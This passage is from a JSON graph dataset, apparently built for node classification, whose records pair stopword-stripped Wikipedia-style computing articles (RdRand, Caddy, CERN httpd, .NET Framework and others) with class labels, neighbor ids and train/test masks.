2 air sold hong kong two hours becoming available online",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      5733,
      8806,
      3691,
      2673,
      6258,
      2676,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      713,
      4810,
      3790,
      1744,
      7378,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      10478,
      1776,
      10481,
      8441,
      7420,
      2819,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      4910,
      4399,
      7983,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5616,
      6130,
      5619,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10609,
    "label": 1,
    "text": "MyAnimeList:myanimelist myanimelist often abbreviated mal anime manga social networking social cataloging application website site provides users list-like system organize score anime manga facilitates finding users share similar tastes provides large database anime manga site claims 4.4 million anime 775,000 manga entries 2015 site received 120 million visitors month site launched april 2006 garrett gyssler maintained solely 2008 originally website called animelist garret gyssler decided incorporate possessive beginning following fashion important social network years myspace august 4 2008 craveonline men entertainment lifestyle site owned atomiconline purchased myanimelist undisclosed sum money 2015 dena announced purchased myanimelist craveonline would partner anime consortium japan stream anime service via daisuki myanimelist announced april 2016 embed episodes crunchyroll hulu directly onto site 20,000 episodes made available site april 2017 myanimelist added king avatar first chinese animation site database march 8 2018 myanimelist opened online manga store partnership kodansha comics viz media allowing users purchase manga digitally website service originally launched canada later expanded united states united kingdom several english-speaking countries mal became inaccessible several days may june 2018 site staff took offline maintenance citing security privacy concerns site operators also disabled api third-party apps rendering unusable moves done efforts conform european union gdpr program myanimelist acquired media january 2019 purchase announced intention focus marketing e-book sales strengthen site myanimelist lists anime japanese animation aeni korean animation donghua chinese animation similarly myanimelist information manga japanese comics manwha korean comics manhua chinese comics well dōjinshi fan comics light novels users create lists strive complete users submit reviews write recommendations blogs post site forum create clubs unite people similar interests subscribe rss news feed anime manga related news mal also starts challenges users complete 'lists myanimelist allows users score anime manga list scale 1 10 scores aggregated give show database rank best worst show rank calculated twice day using following formula formula_1 formula_2 stands total number user votes formula_3 average user score formula_4 minimum number votes required get calculated score currently 50 formula_5 average score across entire anime/manga database scores user completed least 20 anime/manga calculated",
    "neighbors": [
      2156,
      8204,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 10610,
    "label": 0,
    "text": "Treebank:treebank linguistics treebank parsed text corpus annotates syntactic semantic sentence structure construction parsed corpora early 1990s revolutionized computational linguistics benefitted large-scale empirical data exploitation treebank data important ever since first large-scale treebank penn treebank published however although originating computational linguistics value treebanks becoming widely appreciated linguistics research whole example annotated treebank data crucial syntactic research test linguistic theories sentence structure large quantities naturally occurring examples term treebank coined linguist geoffrey leech 1980s analogy repositories seedbank bloodbank syntactic semantic structure commonly represented compositionally tree structure term parsed corpus often used interchangeably term treebank emphasis primacy sentences rather trees treebanks often created top corpus already annotated part-of-speech tags turn treebanks sometimes enhanced semantic linguistic information treebanks created completely manually linguists annotate sentence syntactic structure semi-automatically parser assigns syntactic structure linguists check necessary correct practice fully checking completing parsing natural language corpora labour-intensive project take teams graduate linguists several years level annotation detail breadth linguistic sample determine difficulty task length time required build treebank treebanks follow specific linguistic theory syntactic annotation e.g bultreebank follows hpsg try less theory-specific however two main groups distinguished treebanks annotate phrase structure example penn treebank ice-gb annotate dependency structure example prague dependency treebank quranic arabic dependency treebank important clarify distinction formal representation file format used store annotated data treebanks necessarily constructed according particular grammar grammar may implemented different file formats example syntactic analysis john loves mary shown figure right may represented simple labelled brackets text file like following penn treebank notation type representation popular light resources tree structure relatively easy read without software tools however corpora become increasingly complex file formats may preferred alternatives include treebank-specific xml schemes numbered indentation various types standoff notation computational perspective treebanks used engineer state-of-the-art natural language processing systems part-of-speech taggers parsers semantic analyzers machine translation systems computational systems utilize gold-standard treebank data however automatically parsed corpus corrected human linguists still useful provide evidence rule frequency parser parser may improved applying large amounts text gathering rule frequencies however obvious process correcting completing corpus hand possible identify rules absent parser knowledge base addition frequencies likely accurate corpus linguistics treebanks used study syntactic phenomena example diachronic corpora used study time course syntactic change parsed corpus contain frequency evidence showing common different grammatical structures use treebanks also provide evidence coverage support discovery new unanticipated grammatical phenomena another use treebanks theoretical linguistics psycholinguistics interaction evidence completed treebank help linguists carry experiments decision use one grammatical construction tends influence decision form others try understand speakers writers make decisions form sentences interaction research particularly fruitful layers annotation e.g semantic pragmatic added corpus possible evaluate impact non-syntactic phenomena grammatical choices semantic treebank collection natural language sentences annotated meaning representation resources use formal representation sentence semantic structure semantic treebanks vary depth semantic representation notable example deep semantic annotation groningen meaning bank developed university groningen annotated using discourse representation theory example shallow semantic treebank propbank provides annotation verbal propositions arguments without attempting represent every word corpus logical form deep syntax treebank treebank lying interface syntax semantics representation structure interpreted graph representing subject infinitival phrases extraction it-clef construction shared subject ellipsis extend many syntactic treebanks developed wide variety languages facilitate researches multilingual tasks researchers discussed universal annotation scheme cross-languages way people try utilize merge advantages different treebanks corpora instance universal annotation approach dependency treebanks universal annotation approach phrase structure treebanks one key ways extract evidence treebank search tools search tools parsed corpora typically depend annotation scheme applied corpus user interfaces range sophistication expression-based query systems aimed computer programmers full exploration environments aimed general linguists wallis 2008 discusses principles searching treebanks detail reviews state art",
    "neighbors": [
      1890,
      5667,
      4070,
      5478,
      5639,
      3721,
      10,
      8297,
      7599,
      5399,
      3608,
      8218,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10611,
    "label": 8,
    "text": "CERN_httpd:cern httpd cern httpd later also known w3c httpd early discontinued web server http daemon originally developed cern 1990 onwards tim berners-lee ari luotonen henrik frystyk nielsen implemented c first ever web server software cern httpd originally developed next computer running nextstep later ported unix-like operating systems openvms systems unix emulation layers e.g os/2 emx+gcc could also configured web proxy server version 0.1 released june 1991 august 1991 berners-lee announced usenet newsgroup alt.hypertext availability source code server daemon world wide web software cern ftp site server presented hypertext 91 conference san antonio part cern program library cernlib later versions server based libwww library development cern httpd later taken world wide web consortium w3c last release version 3.0a 15 july 1996 1996 onwards w3c focused development java-based jigsaw server initial version public domain software last one mit license",
    "neighbors": [
      1920,
      11650,
      4485,
      7430,
      7943,
      8070,
      9229,
      7567,
      7695,
      1937,
      5907,
      7443,
      5397,
      8350,
      7455,
      4768,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      6775,
      10791,
      11682,
      7338,
      9387,
      44,
      5677,
      7983,
      10800,
      11439,
      2485,
      6714,
      10622,
      7364,
      11386,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      8923,
      479,
      225,
      865,
      1250,
      2404,
      4837,
      6629,
      6379,
      9580,
      10910,
      2287,
      11376,
      8691,
      2804,
      4213,
      502,
      119,
      2296,
      4725,
      5492,
      10486,
      124,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 10612,
    "label": 3,
    "text": "Barrel_processor:barrel processor barrel processor cpu switches threads execution every cycle cpu design technique also known interleaved fine-grained temporal multithreading unlike simultaneous multithreading modern superscalar architectures generally allow execution multiple instructions one cycle like preemptive multitasking thread execution assigned program counter hardware registers thread architectural state barrel processor guarantee thread execute one instruction every n cycles unlike preemptive multitasking machine typically runs one thread execution tens millions cycles threads wait turn technique called c-slowing automatically generate corresponding barrel processor design single-tasking processor design n -way barrel processor generated way acts much like n separate multiprocessing copies original single-tasking processor one running roughly 1/ n original speed one earliest examples barrel processor i/o processing system cdc 6000 series supercomputers executed one instruction portion instruction 10 different virtual processors called peripheral processors returning first processor one motivation barrel processors reduce hardware costs case cdc 6x00 ppus digital logic processor much faster core memory rather ten separate processors ten separate core memory units ppus share single set processor logic another example honeywell 800 8 groups registers allowing 8 concurrent programs instruction processor would cases switch next active program sequence barrel processors also used large-scale central processors tera mta 1988 large-scale barrel processor design 128 threads per core mta architecture seen continued development successive products cray urika-gd originally introduced 2012 yarcdata urika targeted data-mining applications barrel processors also found embedded systems particularly useful deterministic real-time thread performance example xmos xcore xs1 2007 four-stage barrel processor eight threads per core xs1 found ethernet usb audio control devices applications i/o performance critical barrel processors also used specialized devices eight-thread ubicom ip3023 network i/o processor 2004 8-bit microcontrollers padauk technology feature barrel processors 8 threads per core single-tasking processor spends lot time idle anything useful whenever cache miss pipeline stall occurs advantages employing barrel processors single-tasking processors include disadvantages barrel processors",
    "neighbors": [
      7173,
      9739,
      7699,
      5655,
      10781,
      8231,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      2155,
      8815,
      630,
      8822,
      7313,
      6815,
      8352,
      5793,
      6818,
      8863,
      6821,
      7852,
      9391,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      5329,
      10966,
      731,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      1798,
      6926,
      6415,
      1298,
      6950,
      2345,
      11050,
      309,
      8501,
      5948,
      4928,
      8514,
      6476,
      7505,
      9044,
      11604,
      8543,
      1376,
      10603,
      4465,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      9105,
      5523,
      9126,
      10669,
      1967,
      2480,
      11697,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      466,
      1499,
      1502,
      5090,
      995,
      10725,
      9707,
      10734,
      6639,
      499,
      4596,
      2039,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 10613,
    "label": 4,
    "text": "Norton_Power_Eraser:norton power eraser norton power eraser npe small portable executable uses norton insight in-the-cloud application ratings scan computer system program matches application found user computer list trusted malicious applications list trusted applications power eraser leaves system list bad applications marked deletion unknown list reported suspicious marked removal instead program recommends remote scan upload file symantec servers check virus definitions power eraser aggressive unknown threats whitelisted instead marked removal sent analysis tool also features rootkit scanning requires system restart threat removal also performed restart next boot avoid self-protection viruses trojans",
    "neighbors": [
      9569,
      10756,
      8398,
      10872,
      9791
    ],
    "mask": "Train"
  },
  {
    "node_id": 10614,
    "label": 4,
    "text": "Petname:petname petname systems naming systems claim possess three naming properties zooko triangle global secure memorable software uses system satisfy three requirements systems used enhance security preventing phishing attacks unlike traditional identity systems focus service provider petname systems decentralized designed facilitate needs enduser interact multiple services though petname model formally described 2005 mark stiegler potential system discovered several people successively capdesk – desktop environment petname tool extension available firefox allows petnames assigned secure websites use extension help prevent phishing attacks petname markup language pnml proposal embedding petname information systems using custom markup language pnml consists two tags",
    "neighbors": [
      256,
      4034,
      7480,
      10146,
      10813,
      2951,
      5503,
      5483,
      5612,
      7884,
      11596,
      7983,
      10835,
      3700,
      5078,
      728,
      6813,
      3999
    ],
    "mask": "Test"
  },
  {
    "node_id": 10615,
    "label": 7,
    "text": "Dell_Technologies:dell technologies dell technologies inc. american multinational technology company headquartered round rock texas formed result september 2016 merger dell emc corporation later became dell emc dell products include personal computers servers smartphones televisions computer software computer security network security well information security services dell ranked 35th 2018 fortune 500 rankings largest united states corporations total revenue approximately 50 company revenue derived united states dell operates 3 divisions follows dell also owns 5 separate businesses rsa security pivotal software secureworks virtustream boomi inc. october 12 2015 dell announced intent acquire emc corporation enterprise software storage company 67 billion transaction labeled highest-valued tech acquisition history addition michael dell singapore temasek holdings silver lake partners major dell shareholders supported transaction september 7 2016 dell inc. completed merger emc corp. involved issuance 45.9 billion debt 4.4 billion common stock dell services dell software group dell emc enterprise content divisions sold shortly thereafter proceeds 7.0 billion used repay debt october 2017 reported dell would invest 1 billion iot research development dell inc. returned private ownership 2013 claiming faced bleak prospects would need several years public eye rebuild business emc pressured elliott management corporation hedge fund holding 2.2 emc stock reorganize unusual federation structure emc divisions effectively run independent companies elliott argued structure deeply undervalued emc core emc ii data storage business increasing competition emc ii vmware products confusing market hindering companies wall street journal estimated 2014 dell revenue 27.3 billion personal computers 8.9 billion servers emc 16.5 billion emc ii 1bn rsa security 6bn vmware 230 million pivotal software emc owned around 80 stock vmware acquisition maintained vmware separate company held via new tracking stock rest emc rolled dell acquisition required dell publish quarterly financial results ceased going private 2013 dell technologies products services field scale-out architecture converged infrastructure private cloud computing january 29 2018 reported dell technologies considering reverse merger vmware subsidiary order take company public december 28 2018 dell technologies became public company",
    "neighbors": [
      6153,
      11146,
      272,
      10643,
      939,
      9137,
      54,
      8515,
      10951,
      2123,
      7126,
      8022,
      4194,
      1638,
      2154,
      1400,
      3323,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10616,
    "label": 9,
    "text": "Partial_evaluation:partial evaluation computing partial evaluation technique several different types program optimization specialization straightforward application produce new programs run faster originals guaranteed behave way computer program prog seen mapping input data output data formula_2 static data part input data known compile time partial evaluator transforms formula_3 formula_4 precomputing static input compile time formula_5 called residual program run efficiently original program act partial evaluation said residualize formula_6 formula_5 particularly interesting example use partial evaluation first described 1970s yoshihiko futamura prog interpreter programming language source code designed run inside said interpreter partial evaluation interpreter respect data/program produces prog* version interpreter runs source code written implementation language interpreter require source code resupplied runs faster original combination interpreter source case prog* effectively compiled version technique known first futamura projection three furthermore applying tool 3 yields tool quine first described futamura 1983",
    "neighbors": [
      2595,
      6536,
      393,
      7273,
      5997,
      10618,
      1488,
      9680,
      9714,
      5684,
      1685,
      9914,
      10043,
      2620
    ],
    "mask": "Test"
  },
  {
    "node_id": 10617,
    "label": 9,
    "text": "Bertrand_Meyer:bertrand meyer bertrand meyer born 21 november 1950 french academic author consultant field computer languages created eiffel programming language idea design contract bertrand meyer received master degree engineering école polytechnique paris second master degree stanford university phd université de nancy technical managerial career nine years électricité de france three years member faculty university california santa barbara october 2001 early 2016 professor software engineering eth zürich swiss federal institute technology pursued research building trusted components reusable software elements guaranteed level quality chair eth computer science department 2004 2006 13 years 2003–2015 taught introduction programming course taken eth computer science students resulting widely disseminated programming textbook touch class springer currently professor polytechnic university milan arrived erc advanced investigator grant project meyer activities include associate professorships innopolis university 2015–16 chair excellence university toulouse 1998 2003 adjunct professor monash university melbourne australia member french academy technologies also active consultant object-oriented system design architectural reviews technology assessment trainer object technology software topics conference speaker many years meyer active issues research education policy founding president 2006–2011 informatics europe association european computer science departments meyer pursues ideal simple elegant user-friendly computer languages one earliest vocal proponents object-oriented programming oop book object-oriented software construction widely considered best work presenting case oop books written include eiffel language description eiffel language object success discussion object technology managers reusable software discussion reuse issues solutions introduction theory programming languages touch class authored numerous articles edited conference proceedings initial designer eiffel method language continued participate evolution originator design contract development method experiences object technology simula language well early work abstract data types formal specification including z notation provided background development eiffel eiffel influential development languages including java c python 2005 meyer senior award winner first aito dahl-nygaard award prize named two creators object technology awarded annually senior junior researchers made significant technical contributions field object orientation meyer received honorary doctorates itmo university saint petersburg russia 2004 university york uk 2015 2006 meyer received software system award acm impact software quality recognition design eiffel 2008 fellow acm also 2009 recipient harlan mills award ieee computer society 28 december 2005 anonymous user falsely announced meyer death german wikipedia biography meyer hoax reported five days later heise news ticker article immediately corrected many major news media outlets germany switzerland picked story meyer went publish positive evaluation wikipedia concluding system succumbed one potential flaws quickly healed n't affect big picture like rumors wikipedia downfall grossly exaggerated",
    "neighbors": [
      9345,
      4483,
      9351,
      4107,
      6160,
      3733,
      5677,
      9264,
      6454,
      4412,
      11457,
      10568,
      3529,
      11339,
      333,
      10061,
      5585,
      2011,
      7775,
      10471,
      8554,
      2283,
      11242,
      9710,
      1783,
      3196,
      511
    ],
    "mask": "None"
  },
  {
    "node_id": 10618,
    "label": 9,
    "text": "Eager_evaluation:eager evaluation computer programming eager evaluation also known strict evaluation greedy evaluation evaluation strategy used traditional programming languages eager evaluation expression evaluated soon bound variable opposite alternative eager evaluation lazy evaluation expressions evaluated dependent expression evaluated depending upon defined evaluation strategy effects eager evaluation include imperative programming languages order execution implicitly defined structure source code almost always use eager evaluation order avoid unexpected behaviour occur certain contexts out-of-order execution e.g using multithreaded software concurrent execution code etc. unexpected behaviour result data races atomicity violations potentially unwanted hard control bugs effects many modern compilers capable re-ordering execution better optimize processor resources often eliminate unnecessary expressions executed entirely determined results expressions visible rest program however divert flow compiled program away evaluation strategy defined programming language compiled code written notable exception potential bugs introduced compiler avoid problem modern high-level languages provide constructs allow programmer direct compiler regards optimisations example using block-level construct lock c allows programmer define code block executed order defined source code effectively barring compiler performing re-order operations code block church encoding eager evaluation operators maps strict evaluation functions reason strict evaluation sometimes called eager",
    "neighbors": [
      6536,
      9224,
      6926,
      8722,
      6815,
      6817,
      8738,
      5684,
      1333,
      10043,
      2620,
      6718,
      10819,
      8262,
      2381,
      727,
      7386,
      6502,
      8815,
      10616
    ],
    "mask": "Test"
  },
  {
    "node_id": 10619,
    "label": 2,
    "text": "SureType:suretype suretype qwerty-based character input method cell phones used blackberry pearl suretype combines traditional telephone keypad qwerty-based keyboard create non-standard way input text cell phone addition suretype contains list 35,000 english words user types beginning word possible words start letters show screen additional words also added word list suretype developed blackberry vendor research motion",
    "neighbors": [
      2208,
      9101,
      6271
    ],
    "mask": "None"
  },
  {
    "node_id": 10620,
    "label": 3,
    "text": "RdRand:rdrand codice_1 previously known bull mountain instruction returning random numbers intel on-chip hardware random number generator seeded on-chip entropy source codice_1 available ivy bridge processors part intel 64 ia-32 instruction set architectures amd added support instruction june 2015 random number generator compliant security cryptographic standards nist sp 800-90a fips 140-2 ansi x9.82 intel also requested cryptography research inc. review random number generator 2012 resulted paper analysis intel ivy bridge digital random number generator codice_3 similar codice_1 provides higher level access entropy hardware codice_3 generator processor instruction codice_6 available intel broadwell cpus amd zen cpus codice_7 instruction used check whether central processing unit cpu supports codice_1 instruction amd intel cpus supported bit 30 ecx register set calling cpuid standard function codice_9 amd processors checked feature using test codice_3 availability checked intel cpus similar manner codice_3 supported bit 18 ebx register set calling cpuid standard function codice_12 opcode codice_1 codice_14 followed modrm byte specifies destination register optionally combined rex prefix 64 bit mode intel secure key intel name codice_1 instruction underlying random number generator rng hardware implementation codenamed bull mountain development intel calls rng digital random number generator drng generator takes pairs 256-bit raw entropy samples generated hardware entropy source applies advanced encryption standard aes cbc-mac mode conditioner reduces single 256-bit conditioned entropy sample deterministic random-bit generator called ctr_drbg defined nist sp 800-90a seeded output conditioner providing cryptographically secure random numbers applications requesting via codice_1 instruction hardware issue maximum 511 128-bit samples changing seed value using codice_3 operation provides access conditioned 256-bit samples aes-cbc-mac codice_3 instruction added intel secure key seeding another pseudorandom number generator available broadwell cpus entropy source codice_3 instruction runs asynchronously self-timed circuit uses thermal noise within silicon output random stream bits rate 3 ghz slower effective 6.4gbit/s obtainable codice_1 rates shared cores threads codice_3 instruction intended seeding software prng arbitrary width whereas codice_1 intended applications merely require high-quality random numbers cryptographic security required software prng xorshift usually faster intel core i7-7700k 4500 mhz 45 x 100 mhz processor kaby lake-s microarchitecture single codice_1 codice_3 instruction takes 110ns 463 clock cycles regardless operand size 16/32/64 bits number clock cycles applies processors skylake kaby lake microarchitecture silvermont microarchitecture processors instructions take around 1472 clock cycles regardless operand size ivy bridge processors codice_1 takes 117 clock cycles amd ryzen cpu instructions takes around 1200 clock cycles 16-bit 32-bit operand around 2500 clock cycles 64-bit operand astrophysical monte carlo simulator examined time generate 10 64-bit random numbers using codice_1 quad-core intel i7-3740 qm processor found c implementation codice_1 ran 2x slower default random number generator c 20x slower mersenne twister although python module codice_1 constructed found 20x slower default random number generator python gcc 4.6+ clang 3.2+ provide intrinsic functions rdrand -mrdrnd specified flags also setting __rdrnd__ allow conditional compilation newer versions additionally provide codice_29 wrap built-ins functions compatible version 12.1+ intel c compiler functions write random data location pointed parameter return 1 success option generate cryptographically-secure random numbers using codice_1 codice_3 openssl help secure communications first scientific application rdrand found astrophysics radio observations low-mass stars brown dwarfs revealed number emit bursts radio waves radio waves caused magnetic reconnection process causes solar flares sun rdrand used generate large quantities random numbers monte carlo simulator model physical properties brown dwarfs effects instruments observe found 5 brown dwarfs sufficiently magnetic emit strong radio bursts also evaluated performance rdrand instruction c python compared random number generators september 2013 response new york times article revealing nsa effort weaken encryption theodore ts publicly posted concerning use rdrand /dev/random linux kernel linus torvalds dismissed concerns use rdrand linux kernel pointed used source entropy /dev/random rather used improve entropy combining values received rdrand sources randomness however taylor hornby defuse security demonstrated linux random number generator could become insecure backdoor introduced rdrand instruction specifically targets code using hornby proof-of-concept implementation works unmodified linux kernel prior version 3.13 developers changed freebsd kernel away using rdrand via padlock directly comment freebsd 10 going backtrack remove rdrand padlock backends feed yarrow instead delivering output directly /dev/random still possible access hardware random number generators rdrand padlock etc. directly inline assembly using openssl userland required trust",
    "neighbors": [
      8065,
      5380,
      2821,
      9092,
      4491,
      6924,
      4237,
      5649,
      7313,
      4886,
      6038,
      6808,
      9369,
      9500,
      2719,
      420,
      2088,
      9391,
      10675,
      8120,
      8506,
      1085,
      5309,
      8125,
      8126,
      833,
      7234,
      5444,
      9541,
      3142,
      5326,
      6352,
      977,
      2514,
      3537,
      2516,
      5844,
      7893,
      9428,
      4603,
      7387,
      8795,
      2655,
      1122,
      7783,
      1000,
      8680,
      10985,
      8684,
      9964,
      5358,
      9582,
      1776,
      8944,
      499,
      9587,
      1399,
      9976,
      4217,
      1915
    ],
    "mask": "None"
  },
  {
    "node_id": 10621,
    "label": 0,
    "text": "Zipf–Mandelbrot_law:zipf–mandelbrot law /math probability theory statistics zipf–mandelbrot law discrete probability distribution also known pareto-zipf law power-law distribution ranked data named linguist george kingsley zipf suggested simpler distribution called zipf law mathematician benoit mandelbrot subsequently generalized probability mass function given formula_6 given may thought generalization harmonic number formula formula_8 rank data formula_9 formula_10 parameters distribution limit formula_11 approaches infinity becomes hurwitz zeta function formula_12 finite formula_11 formula_14 zipf–mandelbrot law becomes zipf law infinite formula_11 formula_14 becomes zeta distribution distribution words ranked frequency random text corpus approximated power-law distribution known zipf law one plots frequency rank words contained moderately sized corpus text data versus number occurrences actual frequencies one obtains power-law distribution exponent close one see powers 1998 gelbukh sidorov 2001 zipf law implicitly assumes fixed vocabulary size harmonic series =1 converge zipf-mandelbrot generalization 1 furthermore evidence closed class functional words define language obeys zipf-mandelbrot distribution different parameters open classes contentive words vary topic field register ecological field studies relative abundance distribution i.e graph number species observed function abundance often found conform zipf–mandelbrot law within music many metrics measuring pleasing music conform zipf–mandelbrot distributions",
    "neighbors": [
      7599,
      10527,
      3694,
      6279
    ],
    "mask": "None"
  },
  {
    "node_id": 10622,
    "label": 8,
    "text": "Caddy_(web_server):caddy web server caddy sometimes clarified caddy web server mostly open source http/2-enabled web server written go uses go standard library http functionality one caddy notable features enabling https default author matthew holt began developing caddy december 2014 released april 2015 since advanced two hundred developers adding example support quic caddy supports variety web technologies available statically-compiled binaries windows mac linux android bsd operating systems i386 amd64 arm architectures variety web site technologies served caddy also act reverse proxy load balancer caddy features implemententations found go library enhancements available middleware exposed directives caddyfile text file used configure caddy caddy vulnerable number widespread cves including heartbleed drown poodle beast addition caddy uses tls_fallback_scsv prevent protocol downgrade attacks june 2 2015 version 0.7.1 released patch vulnerability timing attacks caddy basic authentication middleware regards protocols cipher suites caddy uses tls 1.0-1.2 prefers ecdhe ecdsa aes-256 gcm sha-384 although dozen different ciphers supported caddy also used cloudflare platform serve experimental tls 1.3 implementation traditional privilege de-escalation performed c programs non-trivial possible go programs caddy activates https default sites qualifying domain names names tls certificate negotiated via acme protocol redirects http requests https obtains certificates needed startup keeps renewed lifetime server let encrypt default certificate authority user may customize acme ca used often necessary testing configurations q1 2016 caddy accounted 2 certificates issued let encrypt alternate configuration allows caddy obtain certificates needed tls handshakes rather startup feature dubbed on-demand tls enable feature user must specify maximum number certificates issued way caddy receives request hostname yet certificate negotiate new certificate via acme serve immediately caching obtained certificate memory storing disk process usually takes seconds subject tight rate limits serving tls caddy automatically rotate session ticket keys periodically help preserve perfect forward secrecy starting version 0.11 caddy telemetry opt-in disabled default downloading caddy official website opt-out enabled default building source",
    "neighbors": [
      1920,
      4485,
      7430,
      1937,
      11154,
      7443,
      1556,
      2709,
      1688,
      1435,
      8350,
      7457,
      3746,
      8994,
      11682,
      3237,
      9125,
      7338,
      9387,
      44,
      11693,
      7983,
      10800,
      11439,
      2485,
      823,
      6714,
      8122,
      64,
      1991,
      3657,
      5834,
      4561,
      8273,
      595,
      1363,
      2003,
      11134,
      11221,
      3545,
      5469,
      5470,
      225,
      865,
      2404,
      4837,
      9834,
      6379,
      9580,
      11376,
      8691,
      10611,
      4725,
      11386,
      3966,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 10623,
    "label": 6,
    "text": "Comparison_of_file_archivers:comparison file archivers following tables compare general technical information number file archivers please see individual products articles information neither all-inclusive entries necessarily date unless otherwise specified footnotes section comparisons based stable versions— without add-ons extensions external programs note archivers names purple longer development basic general information archivers creator/company license/price etc operating systems archivers run without emulation compatibility layer linux ubuntu gui archive manager example open create many archive formats including rar archives even extent splitting parts encryption ability read native program presumably compatibility layer notes information common archiver features implemented natively without third-party add-ons notes information archive formats archivers read external links lead information support future versions archiver extensions provide functionality note gzip bzip2 xz rather compression formats archive formats notes information archive formats archivers write create external links lead information support future versions archiver extensions provide functionality note gzip bzip2 xz rather compression formats archive formats notes peazip full support various lpaq paq formats quad balz highly efficient rolz based compressors freearc format native pea format 7-zip includes read support .msi cpio xar plus apple dmg/hfs disk images deb/.rpm package distribution formats beta versions 9.07 onwards full support lzma2-compressed .xz format",
    "neighbors": [
      6022,
      10121,
      1420,
      6797,
      1940,
      5397,
      3222,
      9880,
      7325,
      3496,
      3114,
      10027,
      5293,
      7983,
      8114,
      950,
      823,
      6713,
      10169,
      9151,
      321,
      2755,
      11076,
      965,
      1352,
      4296,
      10317,
      1358,
      4174,
      10575,
      4561,
      722,
      2395,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      5096,
      7529,
      9320,
      4459,
      5356,
      237,
      1646,
      10857,
      4849,
      499,
      5492,
      6389,
      7667,
      4089,
      8315,
      6908,
      894
    ],
    "mask": "None"
  },
  {
    "node_id": 10624,
    "label": 2,
    "text": ".NET_Framework_version_history:.net framework version history microsoft started development .net framework late 1990s originally name next generation windows services ngws late 2001 first beta versions .net 1.0 released first version .net framework released 13 february 2002 bringing managed code windows nt 4.0 98 2000 xp since first version microsoft released nine upgrades .net framework seven released along new version visual studio two upgrades .net framework 2.0 4.0 upgraded common language runtime clr new versions .net framework replace older versions clr version .net framework family also includes two versions mobile embedded device use reduced version framework .net compact framework available windows ce platforms including windows mobile devices smartphones additionally .net micro framework targeted severely resource-constrained devices first version .net framework released 13 february 2002 windows 98 nt 4.0 2000 xp mainstream support version ended 10 july 2007 extended support ended 14 july 2009 exception windows xp media center tablet pc editions 19 june 2001 tenth anniversary release visual basic .net framework 1.0 beta 2 released .net framework 1.0 supported windows 98 nt 4.0 2000 xp server 2003 applications utilizing .net framework 1.0 also run computers .net framework 1.1 installed supports additional operating systems .net framework 1.0 service pack 1 released 18 march 2002 .net framework 1.0 service pack 2 released 7 february 2005 .net framework 1.0 service pack 3 released 30 august 2004 version 1.1 first minor .net framework upgrade available redistributable package software development kit published 3 april 2003 also part second release visual studio .net 2003 first version .net framework included part windows operating system shipping windows server 2003 mainstream support .net framework 1.1 ended 14 october 2008 extended support ended 8 october 2013 .net framework 1.1 last version support windows nt 4.0 provides full backward compatibility version 1.0 except rare instances application run checks version number library changes 1.1 include .net framework 1.1 supported windows 98 nt 4.0 2000 xp server 2003 vista server 2008 .net framework 1.1 service pack 1 released 30 august 2004 version 2.0 released 22 january 2006 also released along visual studio 2005 microsoft sql server 2005 biztalk 2006 software development kit version released 29 november 2006 last version support windows 98 windows changes 2.0 include .net framework 2.0 supported windows 98 2000 xp server 2003 vista server 2008 server 2008 r2 applications utilizing .net framework 2.0 also run computers .net framework 3.0 3.5 installed supports additional operating systems .net framework 2.0 service pack 1 released 19 november 2007 .net framework 2.0 service pack 2 released 16 january 2009 requires windows 2000 sp4 plus kb835732 kb891861 update windows xp sp2 plus windows installer 3.1 last version support windows 2000 although unofficial workarounds use subset functionality version 3.5 windows 2000 .net framework 3.0 formerly called winfx released 21 november 2006 includes new set managed code apis integral part windows vista windows server 2008 also available windows xp sp2 windows server 2003 download major architectural changes included release .net framework 3.0 uses clr .net framework 2.0 unlike previous major .net releases .net compact framework release made counterpart version version 3.0 .net framework shipped windows vista also shipped windows server 2008 optional component disabled default .net framework 3.0 consists four major new components .net framework 3.0 supported windows xp server 2003 vista server 2008 server 2008 r2 applications utilizing .net framework 3.0 also run computers .net framework 3.5 installed supports additional operating systems .net framework 3.0 service pack 1 released 19 november 2007 .net framework 3.0 service pack 2 released 22 february 2010 version 3.5 .net framework released 19 november 2007 .net framework 3.0 version 3.5 uses common language runtime clr 2.0 version .net framework version 2.0 addition .net framework 3.5 also installs .net framework 2.0 sp1 3.0 sp1 later 3.5 sp1 instead installing 